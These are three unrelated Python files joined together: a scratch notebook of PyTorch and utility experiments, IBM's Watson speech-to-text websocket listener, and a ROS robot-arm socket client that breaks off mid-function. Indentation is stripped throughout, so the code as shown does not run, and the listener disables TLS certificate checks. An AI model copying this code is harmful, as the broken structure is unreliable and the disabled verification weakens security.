embeds.weight = torch.nn.Parameter(lin.weight)
sgd = optim.SGD(lin.parameters(), 10)
print(lin.weight)
print(embeds.weight)
out = 10*(2 - lin(torch.randn(1, 3)))*2
out.backward()
sgd.step()
print(lin.weight)
print(embeds.weight)
# this succeded because the weights are the same value after the backward step
#%%
from collections import Counter
from torchtext.vocab import Vocab
import torch.nn as nn
counter_vocab = Counter({'a': 1, 'b': 2, '0': 5})
v = Vocab(counter_vocab)
table = nn.Embedding(len(v), 4)
lookup_tensor = torch.tensor([1, 2, 0], dtype=torch.long)
embed = table(lookup_tensor)
print(embed.size())
print(embed.t().size())
att = embed.t() @ embed
# att = embed.t() * embed
print(att)
from torch.nn.functional import softmax
#%%
import torch
B, T, D = 4, 12, 512
x = torch.randn(B, T, D)
encoder = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)
out = encoder(x)
print(out.sum())
encoder.batch_first = False
out = encoder(x)
print(out.sum())
encoder.batch_first = True
out = encoder(x)
print(out.sum())
#%%
import torch
import torch.nn as nn
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)
transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)
src = torch.rand(10, 32, 512)
out = transformer_encoder(src)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)
transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)
memory = torch.rand(10, 32, 512)
tgt = torch.rand(20, 32, 512)
out = transformer_decoder(tgt, memory)
print(out.size())
#%%
# right shift
# [B, Ty] -> [B, Ty] (right shifted, replace initial vectors with random noise)
import torch
from torch import Tensor
y: Tensor = torch.arange(0, 12)
y = y.view(3, 4)
print(y.size())
print(y)
yy = y.roll(shifts=1, dims=1)
yy[:, 0] = 0 # SEEMS DANGEROUS!
print(yy)
# scary, perhaps it's better to only index the first T-1 and then initialize the first as zero...?
#%%
from torchtext.vocab import vocab
from collections import Counter, OrderedDict
counter = Counter(["a", "a", "b", "b", "b"])
sorted_by_freq_tuples = sorted(counter.items(), key=lambda x: x[1], reverse=True)
ordered_dict = OrderedDict(sorted_by_freq_tuples)
v1 = vocab(ordered_dict)
print(v1['a']) #prints 1
# print(v1['out of vocab']) #raise RuntimeError since default index is not set
tokens = ['e', 'd', 'c', 'b', 'a']
v2 = vocab(OrderedDict([(token, 1) for token in tokens]))
#adding <unk> token and default index
unk_token = '<unk>'
default_index = -1
if unk_token not in v2:
v2.insert_token(unk_token, 0)
v2.set_default_index(default_index)
print(v2['<unk>']) #prints 0
print(v2['out of vocab']) #prints -1
#make default index same as index of unk_token
v2.set_default_index(v2[unk_token])
v2['out of vocab'] is v2[unk_token] #prints True
#%%
import torch
# x = torch.randn(2, 3)
# sz = x.size( )
sz = 4
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
# print(x)
print(mask)
#%%
def generate_square_subsequent_mask(sz):
mask = (torch.triu(torch.ones((sz, sz), device=DEVICE)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
def create_mask(src, tgt):
src_seq_len = src.shape[0]
tgt_seq_len = tgt.shape[0]
tgt_mask = generate_square_subsequent_mask(tgt_seq_len)
src_mask = torch.zeros((src_seq_len, src_seq_len),device=DEVICE).type(torch.bool)
src_padding_mask = (src == PAD_IDX).transpose(0, 1)
tgt_padding_mask = (tgt == PAD_IDX).transpose(0, 1)
return src_mask, tgt_mask, src_padding_mask, tgt_padding_mask
#%%
import uutils.torch
# inheritance in python
# Q: do my subclasses inherit the specific values form parent?
class Parent:
def __init__(self, field):
self.field = field
self.child = Child(field)
class Child(Parent):
def __init__(self, field):
super().__init__(field)
self.y = y
# print(f'{self.field}')
def forward(self, x):
print(f'{x=}')
print(f'{self.field}')
parent = Parent(field=2)
# %%
import torch
from torch.nn.utils.rnn import pad_sequence
# note the sequences start with 2 for SOS and end with 3 for EOS
special_symbols = ['<unk>', '<pad>', '<sos>', '<eos>']
PAD_IDX = special_symbols.index('<pad>')
src_batch = [torch.tensor([2, 7911, 3]), torch.tensor([2, 8269, 5, 18, 3])]
print(f'batch_size={len(src_batch)}')
src_batch = pad_sequence(src_batch, padding_value=PAD_IDX, batch_first=True)
print(src_batch.size())
print(src_batch)
#%%
import torch
sz = 4
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
# print(x)
print(mask)
#%%
# https://stackoverflow.com/questions/47863001/how-pytorch-tensor-get-the-index-of-specific-value
import torch
t = torch.Tensor([0, 2, 3, 2, 1])
print(t.size())
# print(t == 2)
print((t == 2).nonzero().size())
print((t == 2).nonzero())
print((t == 2).nonzero()[0])
print((t == 2).nonzero()[0][0])
print((t == 2).nonzero()[0][0].item())
print((t == 99).nonzero())
print((t == 99).nonzero())
# t = torch.Tensor([1, 0, 2, 3, 2, 2, 1])
# print(t == 222)
# print((t == 222).nonzero(as_tuple=True)[0])
# print((t == 222).nonzero(as_tuple=True))
# print( ((t == 2).nonzero(as_tuple=True)[0]) )
# print( ((t == 2).nonzero(as_tuple=True)[0]).size() )
# print( (t == 2).nonzero() )
# print( (t == 2).nonzero().size() )
#%%
# from lark import Lark
import lark as l
json_parser = l.Lark(r"""
value: dict dict "f"
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{} {} f'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# %%
import torch
B, T, D = 2, 3, 4
x = torch.randn(B, T, D)
print(x)
print()
print(torch.transpose(x, 1, 2))
# %%
import torch
x = torch.zeros(4, 3)
print(x)
x[1:, :] = torch.ones(1, 3)
print(x)
#%%
import time
import progressbar
with progressbar.ProgressBar(max_value=10) as bar:
for i in range(10):
time.sleep(0.1)
time.sleep(1)
bar.update(i)
#%%
# import time
# import progressbar
#
# bar = progressbar.ProgressBar(max_value=10)
# for i in range(10):
# time.sleep(0.1)
# print(f'{i=}')
# bar.update(i)
#%%
from tqdm import tqdm
import time
with tqdm(total=10) as bar:
for i in range(10):
# time.sleep(0.1)
time.sleep(1)
print(f'{i=}')
bar.update(i)
#%%
from tqdm import tqdm
import time
for i in tqdm(range(10)):
# time.sleep(0.1)
time.sleep(5)
print(f'{i=}')
#%%
# progress bar 2 with it per second: https://github.com/WoLpH/python-progressbar/issues/250
import time
import progressbar
with progressbar.ProgressBar(max_value=10, unit='it') as bar:
for i in range(10):
time.sleep(0.1)
time.sleep(1)
bar.update(i)
#%%
# conda install -y pytorch-geometric -c rusty1s -c conda-forge
import torch
from torch_geometric.data import Data
# [2, number_edges], edge = (node_idx1, node_idx2), e.g. e = (0,1) = (n0, n1) (note this is reflected on the type torch long)
edge_index = torch.tensor([[0, 1, 1, 2],
[1, 0, 2, 1]], dtype=torch.long)
# features to each node [num_nodes, D]
x = torch.tensor([[0.0], [-1.0], [1.0]])
data = Data(x=x, edge_index=edge_index)
print(data)
# https://discuss.pytorch.org/t/pytorch-geometric/44994
# https://stackoverflow.com/questions/61274847/how-to-visualize-a-torch-geometric-graph-in-python
import networkx as nx
from torch_geometric.utils.convert import to_networkx
g = to_networkx(data)
nx.draw(g)
#%%
#%%
# import time
# import progressbar
#
# with progressbar.ProgressBar(max_value=10) as bar:
# for i in range(10):
# time.sleep(0.1)
# time.sleep(1)
# bar.update(i)
import time
import progressbar
bar = progressbar.ProgressBar(max_value=5)
for i in range(5):
time.sleep(1)
bar.update(i)
"""
80% (4 of 5) |#################### | Elapsed Time: 0:00:04 ETA: 0:00:01
"""
#%%
"""
Use this one to make sure the "end" is shown properly 100% etc
https://gist.github.com/brando90/3304119120841b1ebf892fe93a2cc3c9
the key is to wrap the iterator (of fixed length) using bar e.g. bar(range(100))
"""
import time
import progressbar
widgets = [
progressbar.Percentage(),
progressbar.Bar(),
' ', progressbar.SimpleProgress(),
' ', progressbar.ETA(),
' ', progressbar.AdaptiveTransferSpeed(unit='it'),
]
bar = progressbar.ProgressBar(widgets=widgets)
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
"""
19%|########## | 19 of 100 ETA: 0:00:17 4.9 it/s
when done:
100%|####################################| 100 of 100 Time: 0:00:20 4.9 it/s
"""
#%%
"""
from default
99% (9998 of 10000) |########## | Elapsed Time: 1 day, 16:35:09 ETA: 0:00:26
"""
import time
import progressbar
widgets = [
progressbar.Percentage(),
' ', progressbar.SimpleProgress(format=f'({progressbar.SimpleProgress.DEFAULT_FORMAT})'),
' ', progressbar.Bar(),
' ', progressbar.Timer(), ' |',
' ', progressbar.ETA(), ' |',
' ', progressbar.AdaptiveTransferSpeed(unit='it'),
]
bar = progressbar.ProgressBar(widgets=widgets)
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
#%%
import uutils
def test_good_progressbar():
import time
bar = uutils.get_good_progressbar()
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
print('---- start context manager test ---')
max_value = 10
with uutils.get_good_progressbar(max_value=max_value) as bar:
for i in range(max_value):
time.sleep(1)
bar.update(i)
test_good_progressbar()
#%%
import time
import progressbar
# bar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)
bar = uutils.get_good_progressbar(max_value=progressbar.UnknownLength)
for i in range(20):
time.sleep(0.1)
bar.update(i)
#%%
import torch
import transformers
from transformers.optimization import Adafactor, AdafactorSchedule
model = torch.nn.Linear(1, 1)
optimizer = Adafactor(model.parameters(), scale_parameter=True, relative_step=True, warmup_init=True, lr=None)
lr_scheduler = AdafactorSchedule(optimizer)
#%%
# import requests, io
URL = 'http://safelearning.ai/formalml-data/dataset10000.zip'
# urlData = requests.get(URL).content
#%%
# import urllib
from pathlib import Path
import urllib.request
url: str = 'http://safelearning.ai/formalml-data/dataset10000.zip'
filename: str = url.split('/')[-1]
assert filename == 'dataset10000.zip'
# filename = f'{filename}'
filename = f'./{filename}'
# filename = str(Path(f'~/Desktop/{filename}').expanduser())
# testfile = urllib.URLopener()
# testfile.retrieve(url, zip_name)
# urllib.urlretrieve("http://randomsite.com/file.gz", "file.gz")
urllib.request.urlretrieve(url, filename)
#%%
a = {'a', 'b', 'c', 'd'}
b = {'d', 'e', 'f'}
c = a.union(b)
print(c)
print(a.intersection(b))
print(len(a))
#%%
import asyncio
async def main():
print('Hello ...')
await asyncio.sleep(5)
print('... World!')
# Python 3.7+
asyncio.run(main())
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import requests
import time
def download_site(url, session):
with session.get(url) as response:
print(f"Read {len(response.content)} from {url}")
def download_all_sites(sites):
with requests.Session() as session:
for url in sites:
download_site(url, session)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
print(f"Downloaded {len(sites)} in {duration} seconds")
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import concurrent.futures
import requests
import threading
import time
thread_local = threading.local()
def get_session():
if not hasattr(thread_local, "session"):
thread_local.session = requests.Session()
return thread_local.session
def download_site(url):
session = get_session()
with session.get(url) as response:
print(f"Read {len(response.content)} from {url}")
def download_all_sites(sites):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.map(download_site, sites)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
print(f"Downloaded {len(sites)} in {duration} seconds")
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import asyncio
import time
import aiohttp
async def download_site(session, url):
async with session.get(url) as response:
print("Read {0} from {1}".format(response.content_length, url))
async def download_all_sites(sites):
async with aiohttp.ClientSession() as session:
tasks = []
for url in sites:
task = asyncio.ensure_future(download_site(session, url))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=True)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
asyncio.get_event_loop().run_until_complete(download_all_sites(sites))
duration = time.time() - start_time
print(f"Downloaded {len(sites)} sites in {duration} seconds")
#%%
# https://realpython.com/python-data-classes/
from dataclasses import dataclass
@dataclass
class DataClassCard:
rank: str
suit: str
default_test: str = 'default'
card = DataClassCard('Q', 'Hearts')
print(card)
print(card == DataClassCard('Q', 'Hearts'))
#%%
from dataclasses import dataclass, field
def get_str():
return 'default'
def get_lst():
return [1, 2]
@dataclass
class DataClassCard:
rank: str
suit: str
# default_test: str = field(default_factory=get_str)
# default_test: str = [1, 2]
default_test: str = field(default_factory=get_lst)
card = DataClassCard('Q', 'Hearts')
print(card)
print(card.default_test)
#%%
import subprocess
def get_git_revision_hash():
return subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('ascii').strip()
def get_git_revision_short_hash():
return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).decode('ascii').strip()
print(get_git_revision_hash())
print(get_git_revision_short_hash())
# %%
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_theme(style="darkgrid")
# Load an example dataset with long-form data
fmri = sns.load_dataset("fmri")
print(fmri)
# Plot the responses for different events and regions
sns.lineplot(x="timepoint", y="signal",
hue="region", style="event",
data=fmri)
# plt.show()
# https://stackoverflow.com/questions/56203420/how-to-use-custom-error-bar-in-seaborn-lineplot
#%%
from torchmeta.datasets.helpers import omniglot
# from meta_learning.datasets.mini_imagenet import MetaImageNet, ImageNet
from torchmeta.utils.data import BatchMetaDataLoader
dataset = omniglot("data", ways=5, shots=5, test_shots=15, meta_train=True, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
#%%
from torchmeta.datasets.helpers import miniimagenet
from torchmeta.utils.data import BatchMetaDataLoader
dataset = miniimagenet("data", ways=5, shots=5, test_shots=15, meta_train=True, download=True)
dataloader = BatchMetaDataLoader(dataset, batch_size=16, num_workers=4)
print(f'{len(dataloader)}')
for batch in dataloader:
train_inputs, train_targets = batch["train"]
print('Train inputs shape: {0}'.format(train_inputs.shape)) # (16, 25, 1, 28, 28)
print('Train targets shape: {0}'.format(train_targets.shape)) # (16, 25)
test_inputs, test_targets = batch["test"]
print('Test inputs shape: {0}'.format(test_inputs.shape)) # (16, 75, 1, 28, 28)
print('Test targets shape: {0}'.format(test_targets.shape)) # (16, 75)
break
#%%
# A Python program to demonstrate working of OrderedDict
from collections import OrderedDict
print("This is a Dict:\n")
d = {}
d['a'] = 1
d['b'] = 2
d['c'] = 3
d['d'] = 4
for key, value in d.items():
print(key, value)
print("\nThis is an Ordered Dict:\n")
od = OrderedDict()
od['a'] = 1
od['b'] = 2
od['c'] = 3
od['d'] = 4
for key, value in od.items():
print(key, value)
od[0] # error
list(od)[0] # gets first key
#%%
od = OrderedDict()
od[(0, 0)] = 0
od[(0, 1)] = 1
od[(1, 0)] = 2
od[(1, 1)] = 3
print(od)
for key, value in od.items():
print(type(key))
print(key, value)
#%%
"""
forced named arguments: https://stackoverflow.com/questions/2965271/forced-naming-of-parameters-in-python/14298976#14298976
"""
def foo(pos, *, forcenamed = None):
print(pos, forcenamed)
foo(pos=10, forcenamed=20)
foo(10, forcenamed=20)
foo(10)
foo(10, 20) # error
def foo2(pos, *, forcenamed):
print(pos, forcenamed)
foo2(pos=10, forcenamed=20)
foo2(10, forcenamed=20)
# basically you always have to give the (named) value!
foo2(10)
#%%
print('0'.isnumeric())
print('1'.isnumeric())
print('123'.isnumeric())
print('-123'.isnumeric())
print('-1.23'.isnumeric())
print('0.0'.isnumeric())
print('-1'.isnumeric())
print()
print('0'.isdigit())
print('1'.isdigit())
print('123'.isdigit())
print('-123'.isdigit())
print('-1.23'.isdigit())
print('0.0'.isdigit())
print('-1'.isdigit())
def is_float(element: Any) -> bool:
try:
return float(element)
except ValueError:
return False
|
recognize_listener.py
|
# coding: utf-8
# Copyright 2018 IBM All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import websocket
import json
import time
import ssl
import threading
ONE_KB = 1024
TIMEOUT_PREFIX = "No speech detected for"
TEN_MILLISECONDS = 0.01
STATE = "state"
ACTION = "action"
START = "start"
STOP = "stop"
class RecognizeListener(object):
def __init__(self,
audio_source,
options,
callback,
url,
headers,
http_proxy_host=None,
http_proxy_port=None,
verify=None):
self.audio_source = audio_source
self.options = options
self.callback = callback
self.url = url
self.headers = headers
self.http_proxy_host = http_proxy_host
self.http_proxy_port = http_proxy_port
self.isListening = False
self.verify = verify
self.dead = False
self.done = False
self.is_ws_closed = False
# websocket.enableTrace(True)
def start(self):
self.ws_client = websocket.WebSocketApp(
self.url,
header=self.headers,
on_open=self.on_open,
on_data=self.on_data,
on_error=self.on_error,
on_close=self.on_close,
)
self.ws_client.run_forever(http_proxy_host=self.http_proxy_host,
http_proxy_port=self.http_proxy_port,
sslopt={"cert_reqs": ssl.CERT_NONE} if self.verify is not None else None)
def close(self):
self.dead = True
while not self.done:
time.sleep(0.001)
if not self.is_ws_closed:
self.ws_client.close()
@classmethod
def build_start_message(cls, options):
options[ACTION] = START
return options
@classmethod
def build_closing_message(cls):
return json.dumps({ACTION: STOP}).encode('utf8')
@classmethod
def extract_transcripts(cls, alternatives):
transcripts = []
for alternative in alternatives:
transcript = {}
if 'confidence' in alternative:
transcript['confidence'] = alternative['confidence']
transcript['transcript'] = alternative['transcript']
transcripts.append(transcript)
return transcripts
def send(self, data, opcode=websocket.ABNF.OPCODE_TEXT):
"""
Send message to server.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
self.ws_client.send(data, opcode)
def send_audio(self, ws):
"""
Stream audio to server
:param ws: Websocket client
"""
def run(*args):
"""Background process to stream the data"""
if not self.audio_source.is_buffer:
while not self.dead:
chunk = self.audio_source.input.read(ONE_KB)
if not chunk:
break
self.ws_client.send(chunk, websocket.ABNF.OPCODE_BINARY)
time.sleep(TEN_MILLISECONDS)
self.audio_source.input.close()
else:
while not self.dead:
try:
if not self.audio_source.input.empty():
chunk = self.audio_source.input.get()
self.ws_client.send(chunk, websocket.ABNF.OPCODE_BINARY)
time.sleep(TEN_MILLISECONDS)
if self.audio_source.input.empty():
if self.audio_source.is_recording:
time.sleep(TEN_MILLISECONDS)
else:
break
except Exception:
if self.audio_source.is_recording:
time.sleep(TEN_MILLISECONDS)
else:
break
time.sleep(TEN_MILLISECONDS)
if not self.is_ws_closed:
self.ws_client.send(self.build_closing_message(), websocket.ABNF.OPCODE_TEXT)
self.done = True
run_thread = threading.Thread(target=run)
run_thread.daemon = True
run_thread.start()
def on_open(self, ws):
"""
Callback executed when a connection is opened to the server.
Handles streaming of audio to the server.
:param ws: Websocket client
"""
self.callback.on_connected()
# Send initialization message
init_data = self.build_start_message(self.options)
self.ws_client.send(json.dumps(init_data).encode('utf8'), websocket.ABNF.OPCODE_TEXT)
def on_data(self, ws, message, message_type, fin):
"""
Callback executed when message is received from the server.
:param ws: Websocket client
:param message: utf-8 string which we get from the server.
:param message_type: Message type which is either ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY
:param fin: continue flag. If 0, the data continues.
"""
try:
json_object = json.loads(message)
except Exception:
self.on_error(ws, 'Unable to parse received message.')
if 'error' in json_object:
# Only call on_error() if a real error occurred. The STT service sends
# {"error" : "No speech detected for 5s"} for valid timeouts, configured by
# options.inactivity_timeout
error = json_object['error']
if error.startswith(TIMEOUT_PREFIX):
self.callback.on_inactivity_timeout(error)
else:
self.on_error(ws, error)
# if uninitialized, receive the initialization response from the server
elif 'state' in json_object:
if not self.isListening:
self.isListening = True
self.callback.on_listening()
self.send_audio(ws)
else:
# close the connection
self.callback.on_close()
ws.close()
# if in streaming
elif 'results' in json_object or 'speaker_labels' in json_object:
hypothesis = ''
if 'results' in json_object:
hypothesis = json_object['results'][0]['alternatives'][0][
'transcript']
b_final = (json_object['results'][0]['final'] is True)
transcripts = self.extract_transcripts(
json_object['results'][0]['alternatives'])
if b_final:
self.callback.on_transcription(transcripts)
self.callback.on_hypothesis(hypothesis)
self.callback.on_data(json_object)
def on_error(self, ws, error):
"""
Callback executed when an error is received
:param ws: Websocket client
:param error: Exception object
"""
self.callback.on_error(error)
def on_close(self, ws):
"""
Callback executed when websocket connection is closed
:param ws: Websocket client
"""
self.is_ws_closed = True
self.callback.on_close()
|
HiwinRA605_socket_ros_test_20190625190025.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
point_data_flag = True
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
while 1:
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
s.close()
def socket_command():
while(point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True):
##---------------socket 傳輸手臂命令-----------------
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
